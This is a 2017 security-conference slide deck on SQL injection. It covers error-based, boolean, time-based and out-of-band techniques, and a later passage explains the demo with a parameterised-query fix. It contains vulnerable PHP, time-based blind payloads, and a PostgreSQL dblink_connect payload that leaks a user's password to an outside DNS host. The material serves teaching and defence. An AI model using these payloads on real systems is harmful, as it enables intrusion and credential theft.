
Out-of-band SQL Injection Attacks (#istsec)


Istanbul Information Security Conference, #IstSec
Omer Citak, May 2017


  1. whoami Security Researcher @ Netsparker Ltd. Developer @ Another Times Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
  2. sql injection ● Inband ○ Error Based ● Indirect Inference ○ Boolean Based ○ Blind (Time Based) ● Out-of-band ○ Blind (HTTP, DNS)
  3. sql injection ● Inband ○ Error Based .... ini_set('display_errors', 'On'); error_reporting(E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
  4. sql injection ● Inband ○ Error Based
  5. sql injection ● Indirect Inference ○ Boolean Based .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); $row_count = mysql_num_rows($results); if($row_count > 0) echo 'user exist'; else echo 'user not exist'; ...
  6. sql injection ● Indirect Inference ○ Boolean Based
  7. sql injection ● Indirect Inference ○ Blind (Time Based) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
  8. sql injection ● Indirect Inference ○ Blind (Time Based)
  9. sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'r', sleep(3), false) --
  10. sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'a', sleep(3), false) --
  11. sql injection ● Out-of-band ○ Blind (HTTP, DNS) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')"; $results = pg_query($sql); ...
  12. demo ● dependencies; ○ 1 DNS server => 207.154.221.107 ■ Ubuntu 16 ■ Spiderlab Responder ○ 1 app & database server => 46.101.229.160 ■ Ubuntu 16 ■ Php7 ■ Postgresql 9.5 and 1 unit attacker
  13. demo SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')
  14. demo SELECT * FROM users WHERE (username like '% '||'test'||'%')
  15. demo SELECT * FROM users WHERE (username like '% '|| cast(test as numeric) ||'%')
  16. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(test) as numeric) ||'%')
  17. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect()) as numeric) ||'%')
  18. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  19. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host='||(select password from users where id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  20. demo
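The demo works because the PHP on slide 11 pastes the request parameter straight into the SQL text, so the database ends up evaluating an attacker-written expression and making the outbound dblink connection itself. The following is an added example, not code from the talk or from Netsparker: it reproduces the slide-11 pattern (PHP 7 with the pg_* extension against PostgreSQL, as in the demo setup) and places the hardened equivalent next to it, using pg_query_params so the user value is sent separately from the statement. The connection string, the role name and the two helper function names are assumptions made for the example.

```php
<?php
// Added example, not from the talk. Connection details are placeholders.
$conn = pg_connect('host=localhost dbname=app user=app_ro password=CHANGE_ME');
if ($conn === false) {
    http_response_code(500);
    exit('database unavailable');
}

// VULNERABLE (the slide-11 shape): the parameter becomes part of the SQL text,
// so an input such as  ' || cast(... dblink_connect(...) ...) || '  is parsed
// and executed by PostgreSQL, which then opens the out-of-band connection.
function find_users_vulnerable($conn, string $param)
{
    $sql = "SELECT * FROM users WHERE (username like '%" . $param . "%')";
    return pg_query($conn, $sql);
}

// HARDENED: the statement text is constant; the value travels as $1 and is
// never parsed as SQL. LIKE metacharacters in the input are escaped as well,
// so a caller cannot turn the search into a wildcard match; PostgreSQL's
// default LIKE escape character is the backslash.
function find_users_safe($conn, string $param)
{
    $pattern = '%' . addcslashes($param, '\\%_') . '%';
    $sql = 'SELECT * FROM users WHERE username LIKE $1';
    return pg_query_params($conn, $sql, [$pattern]);
}

$param = $_GET['param'] ?? '';
$results = find_users_safe($conn, $param);
if ($results === false) {
    // Keep the database error server-side; echoing pg_last_error() to the
    // client would hand back exactly the in-band channel slides 3-4 rely on.
    error_log('users lookup failed');
    http_response_code(500);
    exit('lookup failed');
}
echo pg_num_rows($results) > 0 ? 'user exist' : 'user not exist';
```

Parameterisation removes the injection; two database-side measures limit the blast radius if another query is missed. dblink is a contrib extension that has to be created per database with CREATE EXTENSION dblink, so leave it uninstalled where the application role does not need it, or REVOKE EXECUTE on its functions from that role; and restrict outbound DNS and TCP from the database host, so a dblink_connect that does get injected has nowhere to deliver the lookup to.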
  21. where is the güvenlik (security)?
  22. thanks www.omercitak.com All Social Platform: @Om3rCitak
